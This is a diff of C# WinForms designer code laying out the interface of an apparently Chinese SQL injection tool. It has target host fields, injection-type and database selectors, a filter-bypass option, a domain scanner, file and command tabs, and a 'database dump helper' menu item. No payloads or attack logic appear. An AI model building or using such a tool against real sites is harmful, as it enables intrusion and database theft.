+ this.scanInjection_cms_delThisLine = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_openURL = new System.Windows.Forms.ToolStripMenuItem();
+ this.tsmi_tsmi_opentestURL = new System.Windows.Forms.ToolStripMenuItem();
+ this.groupBox12 = new System.Windows.Forms.GroupBox();
+ this.scanInect_chk_isSpider = new System.Windows.Forms.CheckBox();
+ this.scanInect_chk_scanError = new System.Windows.Forms.CheckBox();
+ this.scanInjection_btn_spider = new System.Windows.Forms.Button();
+ this.scanInjection_btn_scan = new System.Windows.Forms.Button();
+ this.scanInjection_importDomains = new System.Windows.Forms.Button();
+ this.scanInjection_scanedURLSCount = new System.Windows.Forms.Label();
+ this.scanInjection_txt_domainsPath = new System.Windows.Forms.TextBox();
+ this.scanInjection_findURLSCount = new System.Windows.Forms.Label();
+ this.label20 = new System.Windows.Forms.Label();
+ this.label30 = new System.Windows.Forms.Label();
+ this.label22 = new System.Windows.Forms.Label();
+ this.label26 = new System.Windows.Forms.Label();
+ this.scanInjection_domainsCount = new System.Windows.Forms.Label();
+ this.scanInjection_scanedDomainCount = new System.Windows.Forms.Label();
+ this.label25 = new System.Windows.Forms.Label();
+ this.statusStrip1 = new System.Windows.Forms.StatusStrip();
+ this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.status_lbl_time = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.status_lbl_threadStatus = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel3 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel4 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.status_lbl_dbsCount = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel5 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.status_lbl_tableCount = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel6 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.status_lbl_dataCount = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel7 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.status_lbl_runStatus = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel8 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.status_lbl_all_status = new System.Windows.Forms.ToolStripStatusLabel();
+ this.toolStripStatusLabel11 = new System.Windows.Forms.ToolStripStatusLabel();
+ this.lbl_packsCount = new System.Windows.Forms.ToolStripStatusLabel();
+ this.timer_status = new System.Windows.Forms.Timer(this.components);
+ this.timer_scanInjection = new System.Windows.Forms.Timer(this.components);
+ this.cbox_bypass_urlencode_count = new System.Windows.Forms.ComboBox();
+ this.gb_basic.SuspendLayout();
+ this.menuStrip_main.SuspendLayout();
+ this.gb_logo.SuspendLayout();
+ this.tab_logCenter.SuspendLayout();
+ ((System.ComponentModel.ISupportInitialize)(this.splitContainer1)).BeginInit();
+ this.splitContainer1.Panel1.SuspendLayout();
+ this.splitContainer1.Panel2.SuspendLayout();
+ this.splitContainer1.SuspendLayout();
+ this.groupBox5.SuspendLayout();
+ this.log_cms_dataifo.SuspendLayout();
+ this.groupBox6.SuspendLayout();
+ this.tabControl2.SuspendLayout();
+ this.tabPage3.SuspendLayout();
+ this.tabPage4.SuspendLayout();
+ this.tabPage1.SuspendLayout();
+ this.tab_file.SuspendLayout();
+ this.groupBox7.SuspendLayout();
+ this.tab_dataCenter.SuspendLayout();
+ this.tabC_dataCenter.SuspendLayout();
+ this.tab_vers.SuspendLayout();
+ this.data_cms_vers.SuspendLayout();
+ this.tab_dbs.SuspendLayout();
+ ((System.ComponentModel.ISupportInitialize)(this.spc_dbs)).BeginInit();
+ this.spc_dbs.Panel1.SuspendLayout();
+ this.spc_dbs.Panel2.SuspendLayout();
+ this.spc_dbs.SuspendLayout();
+ this.data_dbs_ts.SuspendLayout();
+ this.groupBox2.SuspendLayout();
+ this.data_cms_dbs.SuspendLayout();
+ this.toolStrip1.SuspendLayout();
+ this.groupBox4.SuspendLayout();
+ this.cms_data_dbs_lvw_data.SuspendLayout();
+ this.tab_injectCenter.SuspendLayout();
+ this.groupBox1.SuspendLayout();
+ this.cms_dataPacks.SuspendLayout();
+ this.groupBox3.SuspendLayout();
+ this.groupBox16.SuspendLayout();
+ this.groupBox15.SuspendLayout();
+ this.mytab.SuspendLayout();
+ this.tab_cmd.SuspendLayout();
+ this.groupBox8.SuspendLayout();
+ this.tab_bypass.SuspendLayout();
+ this.groupBox9.SuspendLayout();
+ this.bypass_lvw_replaceString_cms.SuspendLayout();
+ this.tab_encoding.SuspendLayout();
+ this.groupBox13.SuspendLayout();
+ this.groupBox11.SuspendLayout();
+ this.groupBox10.SuspendLayout();
+ this.tab_scanInjection.SuspendLayout();
+ this.groupBox14.SuspendLayout();
+ ((System.ComponentModel.ISupportInitialize)(this.splitContainer2)).BeginInit();
+ this.splitContainer2.Panel1.SuspendLayout();
+ this.splitContainer2.Panel2.SuspendLayout();
+ this.splitContainer2.SuspendLayout();
+ this.scanInjectionURL_cms.SuspendLayout();
+ this.scanInjection_cms.SuspendLayout();
+ this.groupBox12.SuspendLayout();
+ this.statusStrip1.SuspendLayout();
+ this.SuspendLayout();
+ //
+ // gb_basic
+ //
+ this.gb_basic.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.gb_basic.Controls.Add(this.chk_useSSL);
+ this.gb_basic.Controls.Add(this.btn_exportConfig);
+ this.gb_basic.Controls.Add(this.cbox_basic_threadSize);
+ this.gb_basic.Controls.Add(this.cbox_basic_reTryCount);
+ this.gb_basic.Controls.Add(this.cbox_basic_encoding);
+ this.gb_basic.Controls.Add(this.cbox_basic_timeOut);
+ this.gb_basic.Controls.Add(this.label9);
+ this.gb_basic.Controls.Add(this.label11);
+ this.gb_basic.Controls.Add(this.label5);
+ this.gb_basic.Controls.Add(this.btn_autoInject);
+ this.gb_basic.Controls.Add(this.cbox_basic_dbType);
+ this.gb_basic.Controls.Add(this.label6);
+ this.gb_basic.Controls.Add(this.cbox_basic_injectType);
+ this.gb_basic.Controls.Add(this.txt_basic_port);
+ this.gb_basic.Controls.Add(this.label2);
+ this.gb_basic.Controls.Add(this.txt_basic_host);
+ this.gb_basic.Controls.Add(this.label3);
+ this.gb_basic.Controls.Add(this.label7);
+ this.gb_basic.Controls.Add(this.label1);
+ this.gb_basic.Location = new System.Drawing.Point(11, 30);
+ this.gb_basic.Name = "gb_basic";
+ this.gb_basic.Size = new System.Drawing.Size(810, 76);
+ this.gb_basic.TabIndex = 0;
+ this.gb_basic.TabStop = false;
+ this.gb_basic.Text = "基础信息";
+ //
+ // chk_useSSL
+ //
+ this.chk_useSSL.AutoSize = true;
+ this.chk_useSSL.Location = new System.Drawing.Point(188, 49);
+ this.chk_useSSL.Name = "chk_useSSL";
+ this.chk_useSSL.Size = new System.Drawing.Size(42, 16);
+ this.chk_useSSL.TabIndex = 12;
+ this.chk_useSSL.Text = "SSL";
+ this.chk_useSSL.UseVisualStyleBackColor = true;
+ this.chk_useSSL.CheckedChanged += new System.EventHandler(this.chk_useSSL_CheckedChanged);
+ //
+ // btn_exportConfig
+ //
+ this.btn_exportConfig.Location = new System.Drawing.Point(708, 48);
+ this.btn_exportConfig.Name = "btn_exportConfig";
+ this.btn_exportConfig.Size = new System.Drawing.Size(75, 23);
+ this.btn_exportConfig.TabIndex = 11;
+ this.btn_exportConfig.Text = "导出配置";
+ this.btn_exportConfig.UseVisualStyleBackColor = true;
+ this.btn_exportConfig.Click += new System.EventHandler(this.btn_exportConfig_Click);
+ //
+ // cbox_basic_threadSize
+ //
+ this.cbox_basic_threadSize.FormattingEnabled = true;
+ this.cbox_basic_threadSize.Items.AddRange(new object[] {
+ "1",
+ "2",
+ "3",
+ "4",
+ "5",
+ "6",
+ "7",
+ "8",
+ "9",
+ "10",
+ "15",
+ "20",
+ "30",
+ "40",
+ "50",
+ "70",
+ "100"});
+ this.cbox_basic_threadSize.Location = new System.Drawing.Point(641, 17);
+ this.cbox_basic_threadSize.Name = "cbox_basic_threadSize";
+ this.cbox_basic_threadSize.Size = new System.Drawing.Size(50, 20);
+ this.cbox_basic_threadSize.TabIndex = 10;
+ this.cbox_basic_threadSize.TextChanged += new System.EventHandler(this.cbox_basic_threadSize_TextChanged);
+ //
+ // cbox_basic_reTryCount
+ //
+ this.cbox_basic_reTryCount.FormattingEnabled = true;
+ this.cbox_basic_reTryCount.Items.AddRange(new object[] {
+ "0",
+ "1",
+ "2",
+ "3"});
+ this.cbox_basic_reTryCount.Location = new System.Drawing.Point(641, 47);
+ this.cbox_basic_reTryCount.Name = "cbox_basic_reTryCount";
+ this.cbox_basic_reTryCount.Size = new System.Drawing.Size(50, 20);
+ this.cbox_basic_reTryCount.TabIndex = 9;
+ this.cbox_basic_reTryCount.TextChanged += new System.EventHandler(this.cbox_basic_reTryCount_TextChanged);
+ //
+ // cbox_basic_encoding
+ //
+ this.cbox_basic_encoding.FormattingEnabled = true;
+ this.cbox_basic_encoding.Items.AddRange(new object[] {
+ "自动识别",
+ "UTF-8",
+ "GB2312",
+ "GBK",
+ "ISO-8859-1"});
+ this.cbox_basic_encoding.Location = new System.Drawing.Point(334, 49);
+ this.cbox_basic_encoding.Name = "cbox_basic_encoding";
+ this.cbox_basic_encoding.Size = new System.Drawing.Size(78, 20);
+ this.cbox_basic_encoding.TabIndex = 8;
+ this.cbox_basic_encoding.TextChanged += new System.EventHandler(this.cbox_basic_encoding_TextChanged);
+ //
+ // cbox_basic_timeOut
+ //
+ this.cbox_basic_timeOut.FormattingEnabled = true;
+ this.cbox_basic_timeOut.Items.AddRange(new object[] {
+ "5",
+ "10",
+ "15",
+ "20",
+ "25",
+ "30",
+ "40",
+ "50",
+ "60"});
+ this.cbox_basic_timeOut.Location = new System.Drawing.Point(334, 18);
+ this.cbox_basic_timeOut.Name = "cbox_basic_timeOut";
+ this.cbox_basic_timeOut.Size = new System.Drawing.Size(78, 20);
+ this.cbox_basic_timeOut.TabIndex = 7;
+ this.cbox_basic_timeOut.TextChanged += new System.EventHandler(this.cbox_basic_timeOut_TextChanged);
+ //
+ // label9
+ //
+ this.label9.AutoSize = true;
+ this.label9.Location = new System.Drawing.Point(263, 52);
+ this.label9.Name = "label9";
+ this.label9.Size = new System.Drawing.Size(65, 12);
+ this.label9.TabIndex = 2;
+ this.label9.Text = "网页编码:";
+ //
+ // label11
+ //
+ this.label11.AutoSize = true;
+ this.label11.Location = new System.Drawing.Point(592, 51);
+ this.label11.Name = "label11";
+ this.label11.Size = new System.Drawing.Size(47, 12);
+ this.label11.TabIndex = 2;
+ this.label11.Text = "重 试:";
+ //
+ // label5
+ //
+ this.label5.AutoSize = true;
+ this.label5.Location = new System.Drawing.Point(592, 21);
+ this.label5.Name = "label5";
+ this.label5.Size = new System.Drawing.Size(47, 12);
+ this.label5.TabIndex = 2;
+ this.label5.Text = "线 程:";
+ //
+ // btn_autoInject
+ //
+ this.btn_autoInject.ImageKey = "(无)";
+ this.btn_autoInject.Location = new System.Drawing.Point(708, 16);
+ this.btn_autoInject.Name = "btn_autoInject";
+ this.btn_autoInject.Size = new System.Drawing.Size(75, 23);
+ this.btn_autoInject.TabIndex = 5;
+ this.btn_autoInject.Text = "识别注入";
+ this.btn_autoInject.UseVisualStyleBackColor = true;
+ this.btn_autoInject.Click += new System.EventHandler(this.btn_autoInject_Click);
+ //
+ // cbox_basic_dbType
+ //
+ this.cbox_basic_dbType.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.cbox_basic_dbType.FormattingEnabled = true;
+ this.cbox_basic_dbType.Items.AddRange(new object[] {
+ "未 知",
+ "Access",
+ "MySQL5",
+ "SQLServer",
+ "Oracle"});
+ this.cbox_basic_dbType.Location = new System.Drawing.Point(495, 47);
+ this.cbox_basic_dbType.Name = "cbox_basic_dbType";
+ this.cbox_basic_dbType.Size = new System.Drawing.Size(80, 20);
+ this.cbox_basic_dbType.TabIndex = 3;
+ this.cbox_basic_dbType.SelectedIndexChanged += new System.EventHandler(this.cbox_basic_dbType_SelectedIndexChanged);
+ //
+ // label6
+ //
+ this.label6.AutoSize = true;
+ this.label6.Location = new System.Drawing.Point(427, 50);
+ this.label6.Name = "label6";
+ this.label6.Size = new System.Drawing.Size(65, 12);
+ this.label6.TabIndex = 4;
+ this.label6.Text = "数 据 库:";
+ //
+ // cbox_basic_injectType
+ //
+ this.cbox_basic_injectType.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList;
+ this.cbox_basic_injectType.FormattingEnabled = true;
+ this.cbox_basic_injectType.Items.AddRange(new object[] {
+ "未 知",
+ "盲 注",
+ "显错注入",
+ "Union注入"});
+ this.cbox_basic_injectType.Location = new System.Drawing.Point(495, 17);
+ this.cbox_basic_injectType.Name = "cbox_basic_injectType";
+ this.cbox_basic_injectType.Size = new System.Drawing.Size(81, 20);
+ this.cbox_basic_injectType.TabIndex = 5;
+ this.cbox_basic_injectType.SelectedIndexChanged += new System.EventHandler(this.cbox_basic_injectType_SelectedIndexChanged);
+ //
+ // txt_basic_port
+ //
+ this.txt_basic_port.Location = new System.Drawing.Point(88, 46);
+ this.txt_basic_port.Name = "txt_basic_port";
+ this.txt_basic_port.Size = new System.Drawing.Size(80, 21);
+ this.txt_basic_port.TabIndex = 4;
+ this.txt_basic_port.Text = "80";
+ this.txt_basic_port.TextChanged += new System.EventHandler(this.txt_basic_port_TextChanged);
+ //
+ // label2
+ //
+ this.label2.AutoSize = true;
+ this.label2.Location = new System.Drawing.Point(19, 51);
+ this.label2.Name = "label2";
+ this.label2.Size = new System.Drawing.Size(65, 12);
+ this.label2.TabIndex = 3;
+ this.label2.Text = "目标端口:";
+ //
+ // txt_basic_host
+ //
+ this.txt_basic_host.Location = new System.Drawing.Point(88, 17);
+ this.txt_basic_host.Name = "txt_basic_host";
+ this.txt_basic_host.Size = new System.Drawing.Size(160, 21);
+ this.txt_basic_host.TabIndex = 2;
+ this.txt_basic_host.Text = "127.0.0.1";
+ this.txt_basic_host.TextChanged += new System.EventHandler(this.txt_basic_host_TextChanged);
+ //
+ // label3
+ //
+ this.label3.AutoSize = true;
+ this.label3.Location = new System.Drawing.Point(263, 21);
+ this.label3.Name = "label3";
+ this.label3.Size = new System.Drawing.Size(65, 12);
+ this.label3.TabIndex = 2;
+ this.label3.Text = "超时时间:";
+ //
+ // label7
+ //
+ this.label7.AutoSize = true;
+ this.label7.Location = new System.Drawing.Point(427, 20);
+ this.label7.Name = "label7";
+ this.label7.Size = new System.Drawing.Size(65, 12);
+ this.label7.TabIndex = 1;
+ this.label7.Text = "注入类型:";
+ //
+ // label1
+ //
+ this.label1.AutoSize = true;
+ this.label1.Location = new System.Drawing.Point(19, 21);
+ this.label1.Name = "label1";
+ this.label1.Size = new System.Drawing.Size(65, 12);
+ this.label1.TabIndex = 1;
+ this.label1.Text = "域名或IP:";
+ //
+ // menuStrip_main
+ //
+ this.menuStrip_main.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.tsmi_menu,
+ this.tsmi_tools,
+ this.toolStripMenuItem1,
+ this.tsmi_help});
+ this.menuStrip_main.Location = new System.Drawing.Point(0, 0);
+ this.menuStrip_main.Name = "menuStrip_main";
+ this.menuStrip_main.Size = new System.Drawing.Size(834, 25);
+ this.menuStrip_main.TabIndex = 2;
+ this.menuStrip_main.Text = "menuStrip1";
+ //
+ // tsmi_menu
+ //
+ this.tsmi_menu.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.tsmi_openConfig,
+ this.tsmi_saveConfig});
+ this.tsmi_menu.Name = "tsmi_menu";
+ this.tsmi_menu.Size = new System.Drawing.Size(48, 21);
+ this.tsmi_menu.Text = "菜 单";
+ //
+ // tsmi_openConfig
+ //
+ this.tsmi_openConfig.Name = "tsmi_openConfig";
+ this.tsmi_openConfig.Size = new System.Drawing.Size(124, 22);
+ this.tsmi_openConfig.Text = "导入配置";
+ this.tsmi_openConfig.Click += new System.EventHandler(this.tsmi_openConfig_Click);
+ //
+ // tsmi_saveConfig
+ //
+ this.tsmi_saveConfig.Name = "tsmi_saveConfig";
+ this.tsmi_saveConfig.Size = new System.Drawing.Size(124, 22);
+ this.tsmi_saveConfig.Text = "保存配置";
+ this.tsmi_saveConfig.Click += new System.EventHandler(this.tsmi_saveConfig_Click);
+ //
+ // tsmi_tools
+ //
+ this.tsmi_tools.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.脱裤助手ToolStripMenuItem});
+ this.tsmi_tools.Name = "tsmi_tools";
+ this.tsmi_tools.Size = new System.Drawing.Size(48, 21);
+ this.tsmi_tools.Text = "工 具";
+ //
+ // 脱裤助手ToolStripMenuItem
+ //
+ this.脱裤助手ToolStripMenuItem.Name = "脱裤助手ToolStripMenuItem";
+ this.脱裤助手ToolStripMenuItem.Size = new System.Drawing.Size(124, 22);
+ this.脱裤助手ToolStripMenuItem.Text = "脱裤助手";
+ //
+ // toolStripMenuItem1
+ //
+ this.toolStripMenuItem1.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.tsmi_seting});
+ this.toolStripMenuItem1.Name = "toolStripMenuItem1";
+ this.toolStripMenuItem1.Size = new System.Drawing.Size(68, 21);
+ this.toolStripMenuItem1.Text = "系统设置";
+ //
+ // tsmi_seting
+ //
+ this.tsmi_seting.Name = "tsmi_seting";
+ this.tsmi_seting.Size = new System.Drawing.Size(124, 22);
+ this.tsmi_seting.Text = "系统设置";
+ this.tsmi_seting.Click += new System.EventHandler(this.tsmi_seting_Click);
+ //
+ // tsmi_help
+ //
+ this.tsmi_help.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.tsmi_readme,
+ this.tsmi_about,
+ this.tsmi_update,
+ this.tsmi_mustRead,
+ this.版本ToolStripMenuItem,
+ this.tsmi_bugReport});
+ this.tsmi_help.Name = "tsmi_help";
+ this.tsmi_help.Size = new System.Drawing.Size(48, 21);
+ this.tsmi_help.Text = "帮 助";
+ //
+ // tsmi_readme
+ //
+ this.tsmi_readme.Name = "tsmi_readme";
+ this.tsmi_readme.Size = new System.Drawing.Size(124, 22);
+ this.tsmi_readme.Text = "使用手册";
+ this.tsmi_readme.Click += new System.EventHandler(this.tsmi_readme_Click);
+ //
+ // tsmi_about
+ //
+ this.tsmi_about.Name = "tsmi_about";
+ this.tsmi_about.Size = new System.Drawing.Size(124, 22);
+ this.tsmi_about.Text = "关 于";
+ this.tsmi_about.Click += new System.EventHandler(this.tsmi_about_Click);
+ //
+ // tsmi_update
+ //
+ this.tsmi_update.Name = "tsmi_update";
+ this.tsmi_update.Size = new System.Drawing.Size(124, 22);
+ this.tsmi_update.Text = "在线更新";
+ this.tsmi_update.Click += new System.EventHandler(this.tsmi_update_Click);
+ //
+ // tsmi_mustRead
+ //
+ this.tsmi_mustRead.Name = "tsmi_mustRead";
+ this.tsmi_mustRead.Size = new System.Drawing.Size(124, 22);
+ this.tsmi_mustRead.Text = "声 明";
+ this.tsmi_mustRead.Click += new System.EventHandler(this.tsmi_mustRead_Click);
+ //
+ // 版本ToolStripMenuItem
+ //
+ this.版本ToolStripMenuItem.Name = "版本ToolStripMenuItem";
+ this.版本ToolStripMenuItem.Size = new System.Drawing.Size(124, 22);
+ this.版本ToolStripMenuItem.Text = "版本";
+ this.版本ToolStripMenuItem.Click += new System.EventHandler(this.版本ToolStripMenuItem_Click);
+ //
+ // tsmi_bugReport
+ //
+ this.tsmi_bugReport.Name = "tsmi_bugReport";
+ this.tsmi_bugReport.Size = new System.Drawing.Size(124, 22);
+ this.tsmi_bugReport.Text = "Bug反馈";
+ this.tsmi_bugReport.Click += new System.EventHandler(this.tsmi_bugReport_Click);
+ //
+ // gb_logo
+ //
+ this.gb_logo.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)
+ | System.Windows.Forms.AnchorStyles.Right)));
+ this.gb_logo.Controls.Add(this.txt_log);
+ this.gb_logo.Location = new System.Drawing.Point(8, 569);
+ this.gb_logo.Name = "gb_logo";
+ this.gb_logo.Size = new System.Drawing.Size(813, 87);
+ this.gb_logo.TabIndex = 3;
+ this.gb_logo.TabStop = false;
+ this.gb_logo.Text = "日志";
+ //
+ // txt_log
+ //
+ this.txt_log.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.txt_log.Location = new System.Drawing.Point(3, 17);
+ this.txt_log.Multiline = true;
+ this.txt_log.Name = "txt_log";
+ this.txt_log.ScrollBars = System.Windows.Forms.ScrollBars.Both;
+ this.txt_log.Size = new System.Drawing.Size(807, 67);
+ this.txt_log.TabIndex = 3;
+ //
+ // tab_logCenter
+ //
+ this.tab_logCenter.Controls.Add(this.splitContainer1);
+ this.tab_logCenter.ImageKey = "log.png";
+ this.tab_logCenter.Location = new System.Drawing.Point(4, 23);
+ this.tab_logCenter.Name = "tab_logCenter";
+ this.tab_logCenter.Size = new System.Drawing.Size(802, 424);
+ this.tab_logCenter.TabIndex = 3;
+ this.tab_logCenter.Text = "日志中心";
+ this.tab_logCenter.UseVisualStyleBackColor = true;
+ //
+ // splitContainer1
+ //
+ this.splitContainer1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.splitContainer1.Location = new System.Drawing.Point(0, 0);
+ this.splitContainer1.Name = "splitContainer1";
+ this.splitContainer1.Orientation = System.Windows.Forms.Orientation.Horizontal;
+ //
+ // splitContainer1.Panel1
+ //
+ this.splitContainer1.Panel1.Controls.Add(this.groupBox5);
+ //
+ // splitContainer1.Panel2
+ //
+ this.splitContainer1.Panel2.Controls.Add(this.groupBox6);
+ this.splitContainer1.Size = new System.Drawing.Size(802, 424);
+ this.splitContainer1.SplitterDistance = 214;
+ this.splitContainer1.TabIndex = 2;
+ //
+ // groupBox5
+ //
+ this.groupBox5.Controls.Add(this.log_lvw_httpLog);
+ this.groupBox5.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.groupBox5.Location = new System.Drawing.Point(0, 0);
+ this.groupBox5.Name = "groupBox5";
+ this.groupBox5.Size = new System.Drawing.Size(802, 214);
+ this.groupBox5.TabIndex = 0;
+ this.groupBox5.TabStop = false;
+ this.groupBox5.Text = "数据包历史记录";
+ //
+ // log_lvw_httpLog
+ //
+ this.log_lvw_httpLog.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
+ this.log_col_index,
+ this.log_col_payload,
+ this.col_runtime,
+ this.log_col_code,
+ this.log_col_bodyLength,
+ this.log_col_sleepTime});
+ this.log_lvw_httpLog.ContextMenuStrip = this.log_cms_dataifo;
+ this.log_lvw_httpLog.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.log_lvw_httpLog.FullRowSelect = true;
+ this.log_lvw_httpLog.Location = new System.Drawing.Point(3, 17);
+ this.log_lvw_httpLog.Name = "log_lvw_httpLog";
+ this.log_lvw_httpLog.Size = new System.Drawing.Size(796, 194);
+ this.log_lvw_httpLog.TabIndex = 1;
+ this.log_lvw_httpLog.UseCompatibleStateImageBehavior = false;
+ this.log_lvw_httpLog.View = System.Windows.Forms.View.Details;
+ this.log_lvw_httpLog.ColumnClick += new System.Windows.Forms.ColumnClickEventHandler(this.log_lvw_httpLog_ColumnClick);
+ this.log_lvw_httpLog.SelectedIndexChanged += new System.EventHandler(this.log_lvw_httpLog_SelectedIndexChanged);
+ this.log_lvw_httpLog.MouseClick += new System.Windows.Forms.MouseEventHandler(this.log_lvw_httpLog_MouseClick);
+ //
+ // log_col_index
+ //
+ this.log_col_index.Text = "发包序号";
+ this.log_col_index.Width = 75;
+ //
+ // log_col_payload
+ //
+ this.log_col_payload.Text = "Payload";
+ this.log_col_payload.Width = 376;
+ //
+ // col_runtime
+ //
+ this.col_runtime.Text = "用时[毫秒]";
+ this.col_runtime.Width = 85;
+ //
+ // log_col_code
+ //
+ this.log_col_code.Text = "状态码";
+ this.log_col_code.Width = 65;
+ //
+ // log_col_bodyLength
+ //
+ this.log_col_bodyLength.Text = "body长度";
+ this.log_col_bodyLength.Width = 85;
+ //
+ // log_col_sleepTime
+ //
+ this.log_col_sleepTime.Text = "延时[毫秒]";
+ this.log_col_sleepTime.Width = 85;
+ //
+ // log_cms_dataifo
+ //
+ this.log_cms_dataifo.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
+ this.data_cms_clearLog});
+ this.log_cms_dataifo.Name = "log_cms_dataifo";
+ this.log_cms_dataifo.Size = new System.Drawing.Size(125, 26);
+ //
+ // data_cms_clearLog
+ //
+ this.data_cms_clearLog.Name = "data_cms_clearLog";
+ this.data_cms_clearLog.Size = new System.Drawing.Size(124, 22);
+ this.data_cms_clearLog.Text = "清空记录";
+ this.data_cms_clearLog.Click += new System.EventHandler(this.data_cms_clearLog_Click);
+ //
+ // groupBox6
+ //
+ this.groupBox6.Controls.Add(this.tabControl2);
+ this.groupBox6.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.groupBox6.Location = new System.Drawing.Point(0, 0);
+ this.groupBox6.Name = "groupBox6";
+ this.groupBox6.Size = new System.Drawing.Size(802, 206);
+ this.groupBox6.TabIndex = 1;
+ this.groupBox6.TabStop = false;
+ this.groupBox6.Text = "数据包详情";
+ //
+ // tabControl2
+ //
+ this.tabControl2.Controls.Add(this.tabPage3);
+ this.tabControl2.Controls.Add(this.tabPage4);
+ this.tabControl2.Controls.Add(this.tabPage1);
+ this.tabControl2.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.tabControl2.Location = new System.Drawing.Point(3, 17);
+ this.tabControl2.Name = "tabControl2";
+ this.tabControl2.SelectedIndex = 0;
+ this.tabControl2.Size = new System.Drawing.Size(796, 186);
+ this.tabControl2.TabIndex = 0;
+ //
+ // tabPage3
+ //
+ this.tabPage3.Controls.Add(this.log_txt_request);
+ this.tabPage3.Location = new System.Drawing.Point(4, 22);
+ this.tabPage3.Name = "tabPage3";
+ this.tabPage3.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage3.Size = new System.Drawing.Size(788, 160);
+ this.tabPage3.TabIndex = 0;
+ this.tabPage3.Text = "请 求";
+ this.tabPage3.UseVisualStyleBackColor = true;
+ //
+ // log_txt_request
+ //
+ this.log_txt_request.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.log_txt_request.Location = new System.Drawing.Point(3, 3);
+ this.log_txt_request.Multiline = true;
+ this.log_txt_request.Name = "log_txt_request";
+ this.log_txt_request.ScrollBars = System.Windows.Forms.ScrollBars.Both;
+ this.log_txt_request.Size = new System.Drawing.Size(782, 154);
+ this.log_txt_request.TabIndex = 0;
+ //
+ // tabPage4
+ //
+ this.tabPage4.Controls.Add(this.log_txt_response);
+ this.tabPage4.Location = new System.Drawing.Point(4, 22);
+ this.tabPage4.Name = "tabPage4";
+ this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage4.Size = new System.Drawing.Size(788, 160);
+ this.tabPage4.TabIndex = 1;
+ this.tabPage4.Text = "响 应";
+ this.tabPage4.UseVisualStyleBackColor = true;
+ //
+ // log_txt_response
+ //
+ this.log_txt_response.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.log_txt_response.Location = new System.Drawing.Point(3, 3);
+ this.log_txt_response.Multiline = true;
+ this.log_txt_response.Name = "log_txt_response";
+ this.log_txt_response.ScrollBars = System.Windows.Forms.ScrollBars.Both;
+ this.log_txt_response.Size = new System.Drawing.Size(782, 154);
+ this.log_txt_response.TabIndex = 1;
+ this.log_txt_response.KeyDown += new System.Windows.Forms.KeyEventHandler(this.log_txt_response_KeyDown);
+ //
+ // tabPage1
+ //
+ this.tabPage1.Controls.Add(this.webBro_log);
+ this.tabPage1.Location = new System.Drawing.Point(4, 22);
+ this.tabPage1.Name = "tabPage1";
+ this.tabPage1.Size = new System.Drawing.Size(788, 160);
+ this.tabPage1.TabIndex = 2;
+ this.tabPage1.Text = "在浏览器中显示";
+ this.tabPage1.UseVisualStyleBackColor = true;
+ //
+ // webBro_log
+ //
+ this.webBro_log.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.webBro_log.Location = new System.Drawing.Point(0, 0);
+ this.webBro_log.MinimumSize = new System.Drawing.Size(20, 20);
+ this.webBro_log.Name = "webBro_log";
+ this.webBro_log.Size = new System.Drawing.Size(788, 160);
+ this.webBro_log.TabIndex = 1;
+ //
+ // tab_file
+ //
+ this.tab_file.Controls.Add(this.file_txt_result);
+ this.tab_file.Controls.Add(this.groupBox7);
+ this.tab_file.ImageKey = "editFile.png";
+ this.tab_file.Location = new System.Drawing.Point(4, 23);
+ this.tab_file.Name = "tab_file";
+ this.tab_file.Size = new System.Drawing.Size(802, 424);
+ this.tab_file.TabIndex = 4;
+ this.tab_file.Text = "文件操作";
+ this.tab_file.UseVisualStyleBackColor = true;
+ //
+ // file_txt_result
+ //
+ this.file_txt_result.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.file_txt_result.Location = new System.Drawing.Point(0, 76);
+ this.file_txt_result.MaxLength = 3276700;
+ this.file_txt_result.Multiline = true;
+ this.file_txt_result.Name = "file_txt_result";
+ this.file_txt_result.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
+ this.file_txt_result.Size = new System.Drawing.Size(802, 348);
+ this.file_txt_result.TabIndex = 0;
+ this.file_txt_result.TextChanged += new System.EventHandler(this.file_txt_result_TextChanged);
+ this.file_txt_result.KeyDown += new System.Windows.Forms.KeyEventHandler(this.file_txt_result_KeyDown);
+ //
+ // groupBox7
+ //
